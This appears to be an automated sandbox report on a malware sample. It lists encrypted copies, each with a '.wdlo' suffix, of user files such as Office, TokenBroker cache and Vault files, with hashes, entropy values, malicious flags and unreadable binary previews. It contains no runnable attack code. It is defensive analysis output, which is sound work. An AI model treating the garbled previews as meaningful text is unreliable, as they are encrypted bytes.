                  Preview:SQLit~\.\8.y.T_..bdT1.........H_..n.73F..I..C....c.....t.B.+.U.I.....?...'..u.<.Q..7.;i..} }..N...Q".o+.L.I.=.#.I..Dh......8.LA...u.........6:..C............8...u...av<..J6.a<t.K..t..~.\8s..|c].-//42..2Y.7....X}d...9....3.:.....cv..z.....w/k.|..:.f...X.}.....Or....f..X....%;_:($.c.l:.)"_...t3sF.IS....P.Z.....I}i&.G.;....N...6.y..1.....*.....`=.JC.bH.,<Oql..{^^q...!s.B......S..z.yz...?{....'..N8! ..d...+9.g8..c...5Q.............+T...RV../a.....8.]..n....8..B.h...>...2....q...p...d..s....$..6.C(Y.4.'.F .R..>.dB....bJynF...3G,X'.p.e...........2..b{.L../.[,....n...2J..rO..aN._.q......I..0...3.>.09.d...n4WWl.k....B...)h./.7....O.8.#&.<Z".dBE......L..R..8j.q.rr9.Y>.H.D6.C....1u....nxT.(MvH..P.<n....B...w....*...hr..,....R...WS...R..m.U...).2.YG....?>.......]?...u.l...z.<i.No.i..u.s&.v..{?#.......v.......u...*"-.}....@.:.3U5..`.fa........g....<....c9S3.$.=.h..}B~.._b..T...\2...Tf.{|........a.<.5$.R^..l.;z..vh................Yb.....]..^.\ck...5w.

                  C:\Users\user\Local Settings\Microsoft\Office\OTele\officeclicktorun.exe.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24910
                  Entropy (8bit):7.992431862312928
                  Encrypted:true
                  SSDEEP:768:00pHanUtNnXfDJUTA2p9c/4uE+rmJqT0BI+w3CCU4:00VRLXfD4A2pewuEO108yC
                  MD5:0421DB46B7C8FD80607DE9E6D14307EF
                  SHA1:868670A840017B51CCC87946C1DFFAF923EEE73F
                  SHA-256:9254AFA679B1B9D9ADFABFD7A5AB5F78BC774A58EF7901FD66855159931CBED8
                  SHA-512:17E1A1710C78AB5A65F60B7E9CFA9A77A36D27007094B502DDCCE218B2BFD5E321C0B4BB5A54DF2201C6BF18B99BAA333C972B35A2B0F7180EB4D20F9B7A5C9F
                  Malicious:true
                  Preview:SQLit........O.j.......)Ru...v......h.Uq \u#....s.&......*.3oQ..."(..C.W../S..;B..T..........\.....2.1..rD.......>...6......U..7.....<i..~..5.06qC..=--.^Q.....X.Z....?..y..q!y..pB.[.>Z..(.`..)..C4.xF..e`F.....*#..2)....0.0...\..0.........g...*a~}XsFl...b.U$..S.,....1..#p.P."..r.....Y..'.....+...RG.k...P.,n`.../....}n........@N..5...W.TA.|....HG..A$......g......a.U.M1..d.........K.W.H..d@.D.y..r`....E...lY8.bnkV..S".=F.Asp.{:\.XD1...N.N6&~..&R....{`...np/;[...t.6.=....o."......S.....~ZX....}&.....sW.:..rx...0.8U..=.!.G{.........5q....Nl.=..W.|=..Hf..oj2#67(..8...!.&.....m.~.=..|l.h..>.....,.W[..J..@.1^...w<.%.+.c..u...:kZ....( .+).....hB........b|6.:r.0.Nb...G?.....a..v......%....x.\8%..o`..I.q....X....{.\33c-.......R......p..C~."..1...G.M.......tx!...&.T=.q.g\...].d....u.$>....t)..f.<'RMb.P.iCM.......$.97..k......M..s.F.P.....If..v.t\=.F}.%...........1.K.....fb....K3..&..K..b".....,.&..T..g..YS.}.3.6z....2..'. ?.>qU...}....f......%.O..y.e\.

                  C:\Users\user\Local Settings\Microsoft\Office\OTele\officesetup.exe.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24910
                  Entropy (8bit):7.992141104328903
                  Encrypted:true
                  SSDEEP:768:Mik/7adPkecCw+F1E7lq6lp0WUyjjnNQs:Mik/4ceRG1lrh+s
                  MD5:DB2F86AE4AAACFBB7EFB7EB38705CF82
                  SHA1:DA7B55C3319B5798BC7F309ADD8F8A995C3C24E5
                  SHA-256:2D6B3BAB13F7DBCFDFBD7251B1625A854E3AD755FCFC067A689E6C79EFBF541A
                  SHA-512:7D6775645C2DFAA6C6D644D45019444D10F9106BCFF76EB17C91915914ED5D96D25C20D76A9F81F3780A9693C74B3CD983203DB76E4D7A40B4BA18CD00D5FB7B
                  Malicious:true
                  Preview:SQLitd8...v.......).qR.D...M.60.a..-_Tu...W...y..-.7n5.....\'7.2.....)..*.AA.~./.h..j........6..!84..q...6.^.j.Tv2.6].g..i.6............W.$~....N.O.O.Q.......Me........*.A%..+.[.E....V.......?]B.......-.m.lZy5/...q^.Z/................+Y...z.a......i"...!C.j...wy..ii......w.B.^.q...3.$... m...=.D...h.....q5.....//.....P=@.C~....f.T&m...yZ..'....H@0....cA...dj..0.....kG........W.....A.Vuu.F...jOd?*.H.._ .v.3..........|.]......F...s.eX.;UF..eP...b......[.,T1.m7b.0......{n..`........$...TtSn.+...}e.........U4nk...5l4.p.I.Y.'.......TR....U..........>,F.1...w}..."...)..1..=.P..r.)..#[.+tb....z..C.....~.:.$a.........S)..g...C.s..Z..n..N..a.O#/..l...c.qm.i.7a.a....|H4.*.$%..W*..X...L.<.u..9\d'.#..rp.m..3......+e....S.y..x.3Y.}.:...w..G.R.d.0:*.L...]s..3..h.&..{...M..O..(j...u..eJ...2u.q.\}........R.&.Q|.U....3......./.}.1.}...._'...`|.i8.<f..q.G.(.M../..\k.n.H.6p.......m.;.9...D..FI..o..um.}..n.W..eU.~..|7.....J3....yrzA%L.4g...

                  C:\Users\user\Local Settings\Microsoft\PenWorkspace\DiscoverCacheData.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1350
                  Entropy (8bit):7.862957433111495
                  Encrypted:false
                  SSDEEP:24:Y98CXHJMhLzbhExuVsKjCRdaDfJwhFjvp0ls9lY7MG48W5DIAQCKekiS5R3zbD:Y9VHeVzbhExuWKEaCv6s9lOjW5LnDS5d
                  MD5:C6B153C6FC8B321F9B0FB135E16E8155
                  SHA1:5014836428C315DF5450B3442E750A4655F75F17
                  SHA-256:A35583B3759DB5D74FF5C77741C58D877E41BBAF92C77F2076587AE0E13CB04D
                  SHA-512:51CDC2BFA296D7841DA1B16D5348B25CD094B573864C83DD47697930A619F20BB8B8127B386E284A0D64A03D0FA79BD6F73CEE355EB06906186985BA34C81E39
                  Malicious:false
                  Preview:{"Rec[.2.9.JmfL..[m=....~....R.(..'.gn.p.<.....v.u{.l..]t......7.a...1....99F.>.mh.........2k/.i..<......<@.,t[U..[.../X..M.u..,..,...W....x.?V...g..../SN.C$$....y.Ijt..X.H.1q.?..z....P..x...U.'......9...5...T. ;.....O#...N.a.....T...I..`.)u...>..>....*9..b.E..#u.....}...9...r..?.,Oa...h..`.}V.WR...O-U..[;...d2:....s.}.h.....X.O.h.s....{..F79..k..Dm..9.}...|..q..........A.S""_...A...{.q.oP.f.L.J.T.]..F1.).Xr...j..N.a<.>.n...T.2(`.X...W....Yc..k....$.@H."......'."..f....q.....j.]4............&..\@..|l.&..e...>+....>.......T_iP..v.V.H......Ra........$..|yr.o..G..Q.F.o4o|....U"\.N.....k...-.bq...n..0~J5...p.D<..(Yn=..k....=d.n.......6..p.8U....._.|..X..2^......I.%`y.d.. .n.I.+^......{..6j.....eLx.4.Q..~uSGN..%..*.2...X.%O...an(...b(.`...y.......T.Z.....7CR...[.p..J....c]p..`.u..N.fYF.l...@..M0.......f......C:.+..CG.S.=.j..gG('.1...H(..+.z$ ..*.-..../3...Sl.bas....Y~..N..a....<M.Hh.......~.....E.y.l;.....M.F..Y.....s...(j.W...}.('<...G..D

                  C:\Users\user\Local Settings\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2612
                  Entropy (8bit):7.9137666991336495
                  Encrypted:false
                  SSDEEP:48:Y5SiyW/7c0DN+Jlj694IHorv7VCwMHhXJtHa8xrf1KYk3nD:oaW/Qpvj69qhMlz68NMB
                  MD5:7C719EF7422DCD8ED075CA12E1377814
                  SHA1:40BD079B2827839B179F434F77658B50F5754160
                  SHA-256:8B7ED8CC0430C388C9E4B3B2A3308A1DE200BFEE28CB579426A066283597FE20
                  SHA-512:4F55693278EFB4D6ED6B9BAB6EA5317D08AEBA89B011D91547CE503A53199E8E6B5364B5AF6F51A4EE8BD3D46E6344BB948DF3A21FA1CA393DFE247427A01ABB
                  Malicious:false
                  Preview:{.".T..jO.!......_w..c...?T.|*l.D..=.:....-.?.C..A.,.A.-L.W.?....Q......`2....-j.u..q....*...^[..A..ZH-....|04chx.....C...W...n.5i..+t..LWVC.wb.P#.m......C5.&V..cU]..*I.n1&.i,e...N>.6d.......U..Q.d..7.D..k<gf_Th.]..`.@`.z0.9.G[...?0.H%.4F...~...Dt..`O.j.O.|...W..G-....p....6...U)Y?..F.W.:Jt...~@..[l..qU...c....:Y?..e.TKh..".MZ.C..=3.(.ko7.=.[....>.C..;.4..(:3eZ,........R..0.z..ZOV.......nA=..8..V..g.T...h.....*C.'..?..D-..33@u.W=h..;.d.Wh.6..X.ZC"L..T.....E.....yY.[..,....D.4.s....N.&.P~......_..8.....q.X.'...".?V|..#....B).+..zq.&...Q...0.....~...D.-;....9.&\...{......U..:.1.../.Q1.....$sUzO.Xw..]..^....o|J..P...SP.za...l.W.....iB....|.54?..A.;.....(qJ@. ...ux.....5.e...1.Y.....BQ.n..\.05...BI....r{.M!....!. ..c.w..ao....r.GpZ......p4.8.`.|.dx~~pJ-...h,.E98W..v.....3[..Op1E].[5...(.....yie....+.t .5...+..0.*.x..m'c...+...g..Y...G.....[4...C.Q.A.C5{......#.3...x.#..m..x....OR.....t.>...UY......_.#.Om.a..4.|..j-....

                  C:\Users\user\Local Settings\Microsoft\TokenBroker\Cache\1521f696d8626c8e8127c0284ab987ff1974f39a.tbres.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2612
                  Entropy (8bit):7.928433252034019
                  Encrypted:false
                  SSDEEP:48:AfQVptrrAvrxKEE2haAD6Pefvv2NQfp8aiRwxf1W1gkYOfD+gE8WrZv5W3nD:40pFMvNhOAuPef2NpaYwN1W20rWrZm
                  MD5:CA97ACB771A726CC9D2DA84A5FF4BAC3
                  SHA1:A4D7A489047208675329E150332A1E1D4C38E0B1
                  SHA-256:2634F27EB04391AA8A3348569BE25E1EFC67AC7DB98A9A6EA8607C153E40A224
                  SHA-512:85E4F540DB1003F60DE94B0DA97DD41C70C02B402D65A27CAD7BF33E3513737C1F1C75E0FB4CC2688897B8E02CDFD0341F692B21148ED21122F7B060245E81A0
                  Malicious:false
                  Preview:{.".T..g.O..n@.F.vo.0.Lb.".P..q...:..M...3...,:Ia..Z&.K4O...j..Em..Fj#.......&n..4......\uI}.z....S....]...-...@.a.{.*c... .[..&.m...Bv.d.....PT....:.dbx..X.Y.#xO.l.X..._.;.....-.|k..~..9.A.KUt8.XH6.=._>{...5.}....5h....{..S.....Z... ...KXj.....:uh.X<...Z.C.J3..T.,.\.O...})...).l.&.6..y...^...=....>(...&[.V'.,..-= ..61sK$.......@.u.w.\.C7..|5.0..Q...}j.w?..{{Y...O.|...P".Z:2.o..yJ...i...............-C?..7.M5#.....0.c.p..S..f.M.0.:.?.......T...Fq..'..V...V/I..E].W._9&ZQ...T.@qJ.0..i..@B..6....u@.D...w..tX.I...>.w...=.Z......N....:.$...Q....>Y...].l<|.-......|...K..U...ee.Z....,9...P.C..9.....Y.t...J.BG;I.5....O..@..j..."..K..|(...B3w.<F...,..v...y.yk{k.....J....e. -.V....v.6.IVj..ac.{..8.(.....G.P.[.===ZB. .RQ,..?.C.[8...z..Ez"Q.v..WyjC.O.cr.[.......X*7.1.D...t....C+.-.V....A0........I,.0G.^..r.(...x..fc*1>..!.$f..xog0).:..v...T..74..\%.....O..<t.+...q9sc.}y...X...5-...Y`.#....c..S.c.$.@...l;....<J...hE. ...h1.z...I....G.[.K

                  C:\Users\user\Local Settings\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):3018
                  Entropy (8bit):7.928518027851215
                  Encrypted:false
                  SSDEEP:48:EZHJ/ecvxeQIFsJssRvpg7NOXDIU+VzhanesFHwYD430okAVfln3C2wbeqtUoeNb:EhJ/fvoLsyQxgxOXEU+Vzhahn4xln3nF
                  MD5:954C211D2C6DE5BC17B686AB4059EADA
                  SHA1:516C9FC2CDFF335490DEA6ADA575C7E1EA792EF0
                  SHA-256:AF1AED6CA01D875BB8D157BEF0C48D12261188620B2C5FBCFEFC7617F75F5734
                  SHA-512:96DEEB71BEB040502D82EB5218D8ECF2F3476E26AF11A05EF79A4006E217BDC06D9C4D26B88F780D950469797CE03B5BC930BA98B4C4CE80923FF8BE30E76718
                  Malicious:false
                  Preview:{.".T...r..U.kH..^.D_.c......3h../...r.iDw4...$.N.-dG:2...lkAlH..k.p..........=_.......:..sPrfV.....~x..@....a..DL...P.I.>....th.dh79...K~.m...k....aMhq.Lu6q?..]\......y6..U..|....8.o%p..h..I.5=iLe.,.b>9.8..S......g..vY...wM.z.~..Ca...q..c.j.Q.qg$.W.....?{..C.a..p.nkDP....,;.(..g...s.....@}.V...q.^..FgAlEm=....^6...{....;]oAMq..q.0j(.p....'..`..M[?..?O.#....}........-..mV.t.D}.m..H.......KU....4.....L.@M^P.....C....,Z....#....nM....T..5..=x.kKM...%H...X....%-+.#./+ft....5..PxL.L.R....]. i.}]].....?(X......6......g.,.j.j....E]a.7..^l=..E.A...3.f...Uo...(...1[r.D.7|d<.#.@.']H..u.o..@%$...~.t...M..Ud.......~C4.TyEF*m\.AG.qP.../UF...j.~.)Y....l3...8._>I...O;.t.v...n......6}|.........F...s.e.l!..A.\a]8....)...."}.R.^..g.W..X.Q^7.L..Z.n.h.....-.O3,./....>........y..........k......;._..z.ND....e#<..............?.k=.}..:.....c.M..k=._.1.t.....{.....?.....Q....6l......8;3+.cV.....^.Z.c.Mr.G.X.&Wq]b...=.N.V..e.Tl../5.(v.....a..^...0GK..4

                  C:\Users\user\Local Settings\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2612
                  Entropy (8bit):7.922200408884493
                  Encrypted:false
                  SSDEEP:48:IN+t8qKDaTgSrKbAsC52ftFANxjanKZyjjs+I8i2HW5Y9b+bzXeq+tYZh3nD:IyJJ0zsCFG+KwvHWbbGyr
                  MD5:30F12D22EBE0B64772350437647AF07A
                  SHA1:6A9F5D952A1AD08AAF4D440D2CD143E10F074B7A
                  SHA-256:68B9CDF338B095C6AEF4A6F0E369A1E24A25535D3BFED9F84D9682132B44D427
                  SHA-512:F620F3D8E469CC3174A5C56CFF9B226F5F22941CE76B8A05780E92C4D037DD43A318BFC1D987A889241DB61EABF4DDCFF3608E176C70114F0A2F3C22E377D677
                  Malicious:false
                  Preview:{.".T.fx:}.>.[... v.{...Gg..-Y.....%...p.>b<..I...~.4.k....5... :.T.8.`9...9E.'^.........qv.gI..y...B...........Y...K.-.<h.]9.&a.K0Ay...1.IM...f..Ur.L.".Q_.K~ms,..%..].`.......J....&!x."....q2.....J".P7.d.M..y.d...$.~.&.d....._...fL..K....Z..Jf..y..Fi..X.>.....6..i.e...7RX../.rr...Z.p.:......G.4.1.VI..T.!.... .....O6.'.I. ..ia.].6.........k..X.#n...B...@.m.u..y.W....i...'D..........z.R..Q...I.=.>.vy...O..*.....-..K.>........k....xF.].7..!...9..74.H.M.....Z|\..C...."....O....9.6p.4.U+.......}.....]....E..xq...7...]..6..+5.J.....}.....Afw....V.cK.Bf."..U.3!.o...D5ft:+|fn.JX...q.&.2C1X.../.L.............|...An.&.W..A.|.AY....)/...mO:.3.."...{.)C.\H...%...s..p_..X.../.I#...a.#!..~@.&tz...[.rk....A..!...|.|@.i1.p@Q..... ...._H.....X...;..U,...L....j4_T}.1E.CP....7.j..^>..x...iXZ ...'&c7e...&.SCs..qG.p.-..6.7.l#...o.vm...oE8...V.....Jl..'k\I.'.0."m...hp..5.Vu...imnI,..dD....3U......`....Th..e....:F.rB...o._.,m.Cq.:A...#..v.U.f..k^T.L.*T

                  C:\Users\user\Local Settings\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):4956
                  Entropy (8bit):7.960165446910073
                  Encrypted:false
                  SSDEEP:96:AOGgUIBLUAzqSikR5TUIbTB2YFv/qm90phwEeqf+dlb+O:AAdUAzfiCF4YFv/qY0pGNqW+O
                  MD5:796B9AAAA57FEAF9579140D7F33CAC47
                  SHA1:E50477F3823B3E222B825611A700CD58185B1F3F
                  SHA-256:7D5D482FA28BDB5F42F1674D248222FCBF1D9B8B36AC3F99D6772112D33A131F
                  SHA-512:1FAF63C9684AFC88C6EDC9B1EFF29ADA65F51A49981EA258CC00D53D74293B021486817162F7FDE6C7CE859AA7F58A5EC91D50C7A1A2BFD0F0FC568589AA1978
                  Malicious:false
                  Preview:{.".T.......G.(.._.}..B............c..G..7rE\.6*.."&.Uk/...:.`..s2DH..u$.u..>..5....%..S.#...I....I.m.F...x.....z._..k..'o...E..`...i.A_.5jy.#1i......y[...jv...G.r.aE.7wJ9. ...~C..M...c6....S..7Z......>VY.....(!..O.x.........".o<.6..H....q.^R.F|..S.x.O.k..w.".A..O...7.M.../?.Q.&.=....m/.7Km...B..^.6..1#>.uy...6R..,..D.]@.j0o*......=.?R....T.>.Q.Z4..![....R......r`|8...R.*.......j....z....#F..^..t.t.0+}.l..1....|..CY.b..~.....Y.m....\C....Jf.*..L..._....w...CA..y..M..0.md.a..A.@_..|"......D.......C.L$.n...X......h...+}.Z..}.kx.1ZQ.@t.......4^....[Y....a.;.>n...TozF.t...9....*%Xn.4.(?...*...q.$...R7.v..:H.<.sA.i..W.C.L.` HT.....)-b:.... .h.?...`.r..koG.,...w.T..2..a5D.V...2.{...Z...?.H..A..IQE.D..iR..AdQ.X..".t...z......J@.k(...7UC....a../..-T...I...G.h..Ymv..O.a]..../.!.).}..'o.....u.L...#:w\.N4.V..i.G.B.f<...u.;.....a..>...3!.".....).z+.......:...H.1..H.B......|!U...N.'N.c..x'...^.ir.Ub.u..A....C.D..7.9..A...=..1^(..........3$].b.S..

                  C:\Users\user\Local Settings\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):3018
                  Entropy (8bit):7.93298023113247
                  Encrypted:false
                  SSDEEP:48:hx6QNdI7c1CKV/7KyU1X8atlrO5SraOR0FX/AZXd10jspLxFtDmJNvfaCTe8w41S:h9H1CcvUB8C45lPGdAYLTtaJV6w1qN0e
                  MD5:82973C684518BEA749935E8B008110D1
                  SHA1:5573595CEE6FC773F76A5DD7D7BACC26812FF958
                  SHA-256:4D24EF81F149FBA450F030F9E836CC645AEE60731CA48B2C71DF58B30A139822
                  SHA-512:17B2E2C161F7D7CEAC9B74356E042CDD458E23B686F6C86E3FBA99F768241E064DC877CCDAF42D4890758B94EDD854C14BCAEE8FEE467CC20743D7DDF4671463
                  Malicious:false
                  Preview:{.".TD.db[9....z.....].A.l....E7..T.1.WE...%..U......G.....hHM@.dN..7.2P|;.DV...Xn.`..Jj.2*....>qG0.Y..'tb..F]...*FC.*.!..W..........j.4X.A1u..P..(.c....8..G.yk..r..y.r....gcI.....L...`....P..Q.'.y<......rUH<.7......;pa..o...^..."<..0.W7*I"..vq.........(......K.e....eW.z.B.". ..^l%l.o..x.Rp=.*y..a..d..@..p0. .7.`o...RJ/z.AD..U.G.^..L.k.q.Eu..|..4%.......-.~B3......Hg..,..s .:.^.b.....[...._..u...7..Tt..I.."b~B....8....HV...?.=...*j;......`.%C..\1.e.|.QD..mL0~n|..JoS......4M......+H..z.S.....y<........R..9.'..-.Wk.t..\y.!..q......5.....#~.}g4.[.....aF.......8......W..G..$...-.7A.....=.X.oB...z.T...}.u.)B...&:q..8L..+..Uf.......7..\...N.AG".K.1R...s..q%..n.h.{.....n.59..A.+|w..f. ....=.... .*!X%......=....p..rb.`.h*3...K.5...D...+>+.(.)..bX.ty8.HZ....p......./62.....BP[h...)...;{...A.A... .5[.....n.d.6..k.7=..)...Z.l8`.Y(uY.)...~.3....X........d.hh..-......K6....>........&..f....6%?.t....s...6M......U....+......4....h.....mr.9$..N..n.g>.

                  C:\Users\user\Local Settings\Microsoft\TokenBroker\Cache\f036564d8b727dbe99499799c7e51936a642f62a.tbres.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2612
                  Entropy (8bit):7.931614411603075
                  Encrypted:false
                  SSDEEP:48:leLyHn1a7w2dyOLxduQruEEIWqX2sle4EIbSAFO0ReRScTMpje50Db1LY3nD:wLo8DjuQ6EUqXUkbSAqccsScs
                  MD5:3CFF1179C5DFAFC507EB94380FBB0A4D
                  SHA1:E6888908F18E6CE7020E4D8D0D01BDE9244B13E8
                  SHA-256:7054114FB50CF19270219389F06F403CA432346D616E89933144EDEE879E7B19
                  SHA-512:B742A6F263C933A0AB1FD0C68B7590A019A04F430D8F5A8D92814622E779A76D3769274BE3E1BE011E1543034736B4B913DC3AE66A8AD3BC13EEB76C353889D6
                  Malicious:false
                  Preview:{.".TNv.J....l..*{oN.X..B......jN.._..e.EqN..#{.....#j.Q...A....Z2S9...:..z..w.iE.*..........1.K"d.....bHsc....S.-....'.|..d..p....&.u..t.E...3.....R.RC._.0..7....j$......k.OyCL.1S..(.......T....q..6]H.~.S.....d:...../_.U........}.m:7r.6....d....H.~(j.Bi.2.3b.\....R.....Q.....>\z*.....$.N..>.U.-.u..?.rM.....q...9Y=x.&.E..,......X*l@...M...1),6.-..Ue.U4W".....cP.re....A]Vw......%.9.../.p......<...]..0..dN.....f.. .-t....;.:...Y8.>....=.+^%..h.%&..Z..B!.Z. .._.../.L........c..qD[[.B.:...(*!i!;s...Z.........IO...Y|.3....={.:.....7.v.$u...[5.......K4m..(3/..,E$.E\C.kT......D..j.....G]_..H.j}.F.......b.=.182.z.(.f....S2..%S.?...J>D.z..B.;.v..h....F...u...e..zUlw.k..L..<.7.....q...#.........P|....d....9J./..f....;..}0.=..<..r9.h...|...L....b.2...=..CA!........*;...C.+......6.,....].Ge./z....c.e..'..kn....q.AA<s...A.n.u.6.....xg..`.8Oh%.5.>j5...........V"/;q{GuypFk5...a..C..=...J....6.%....dy.t....L.......x }.}._...R.o.W....{6h.....

                  C:\Users\user\Local Settings\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):770
                  Entropy (8bit):7.710303171800778
                  Encrypted:false
                  SSDEEP:24:JM+QqnVLMVVbX/KjePRfHBEVGnPBsh2BTU3zbD:urDvgWRfgGnPBsh2tU3nD
                  MD5:791B3C8FF9B00663D979AA2CA0289369
                  SHA1:99F58FEB8AAD860BE7869DAFB1EA76120992208A
                  SHA-256:A7A9702B092A17DA472B70DDC12105AA02BE64FC3E1E92FA7057626978FADBC5
                  SHA-512:1382C9BC817E9F8E8A6477A75617FD5B9D9AAA33C96C9B2C30AB9C95875AE21E908FC50E0B470A0CE8DBF3532F009BF3A2CDFAA1347E8F12568266044C510F5A
                  Malicious:false
                  Preview:....B..H....u.......9..D..0.L^!..w.w'P..2j.... ..yv..{..1.`.9<.{.<N..}.[....1..>^.0=..o...]..m....F..cy.6.. ..&]"......LY...D....j.{_.A.fG..p..XG.."....Z......._`..........*7C...1....v..aq...^.{.....d..%QyY.....5.+Y....c.....9`....t+.Vg...x.O.X...Y..Hu..~S-&%...F...~.D.mW........x.-&m*...&v(...._.Df.Y.PC..../~k....?...J%z\o.....Ef>...za.._.....t.n.......p.oL?.L,x...#...k..y.s......xS5..OHA..!...kAv..s.M..!...u...#.../.*GYN.Dy...lQ......A3...S....`..,.4...bQ.'..G.....^....1.(.{y..>.gn.........Oh..........~.wW.]..".a........\........Ra.=6..H.C.m.Q*.I.w........m...L...8 e.PF.~l...[.jB.".NoJ..tE..N^.2..PX."ft...d..:.l702ot\:Q.6....}...~%A..[?.&=...+i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\Microsoft\Windows\2057\StructuredQuerySchema.bin.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):424152
                  Entropy (8bit):6.331431996139815
                  Encrypted:false
                  SSDEEP:6144:pCL7uwr3mv4/MDTkfkbszYXkm+vyJfbnQkK96B88yKv4bWTmTvEiLST:pW7uKmw/MDxIzbm+6dF4/M
                  MD5:5EFEF93D73E4E2A8442F419161BD0C9F
                  SHA1:FB198954E96ADBC580481678E476D3C6110E0E91
                  SHA-256:2FF781D3A277D6D30BF99E69C46351F3F5B131B48F8C143FCB4790BBCAC0EA60
                  SHA-512:BF4BD36C5AE695F107596469066E7908B111794AEC9F29EAFFFDA678354D9128FDA81AB506F84ED11A785FB574382B06EF2D32AC56EBB809B3DF4A1D20735F8A
                  Malicious:false
                  Preview:...P.[.X@?.r.,..'..Gh......&.G.a=5...@@~..x.L:m.....s-....O.(.....kQ...6(..=1,..L".hs.*I........m.m......B53[,..,3..P9.E&.N..I9.......6.o.2....R..p.*.....;a....sqm.pmo...k0...f..|.`...c...i.G..=.UlU......+y...(.B*..O.k...J.{(......I..h......e..P.cc+.......u......`4.Pj/bl.-....z........y....@<.-...a.x(.....v.h.....8d=..Q:q........-w.2&._a.K....4..EV.R..d. .^...{.v..x;W..vf.;.pD..L..d.}T."U..Q.h..xP.W .....97AM..Kg,t..8u>.m.....4I.^.........i!.;0...C...@.Y.J$...]..Vs.....e... 1>!.K..<W.!.[....T....Id...,.n.%.ym.....+...]<qN.S..u..:/_...{ ~..S8...$#.[R....q.2..N.k.J.#.....JV.H.;......H.M.....d.y..c..+.J...>Zf[4...@.6.~z......T.*....|...,V..4L........F,s .ud.8...rSZ...T...h._..o........P...W...5..S.....lW.r^......3...^......1II..:...,..-...z...q.#$Q.K..(j. W.u.R.....Jp... .....hh..]Kjk......'...wi)6*.\z..t@.V{.......\9'.k.....*..N.....j..6.^..Y...0.~U>...2.z..J<.k..T.b.x^...d.3}W`...........u..O...0..y......c?#.K.\....X..8.u..w.)c

                  C:\Users\user\Local Settings\Microsoft\Windows\Caches\cversions.1.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16718
                  Entropy (8bit):7.989555505893435
                  Encrypted:false
                  SSDEEP:384:OsxKy99cfrvT/ib3NYYAkaVIY7YHKB93OV+HB3DabqVdrAT:Dxf9ifr7/ibN49YH8XMT
                  MD5:00D4FC5E219B42D830E0E1EDB379AA6D
                  SHA1:DA99E15B32066B4342E40441543C8699D7A7784A
                  SHA-256:AE05C4E466B254DC072E954FCCF7EECAA89E18C08793ABB1135DA1636E98D412
                  SHA-512:D30D450836307731CC92CAEF583AC85864926335BE0EC15203AB38AC47106A9C0469EC2E10C73B1DD9E6C206E7B9C0F055DA43A0503E10EC6CD7CC1EFEB51D79
                  Malicious:false
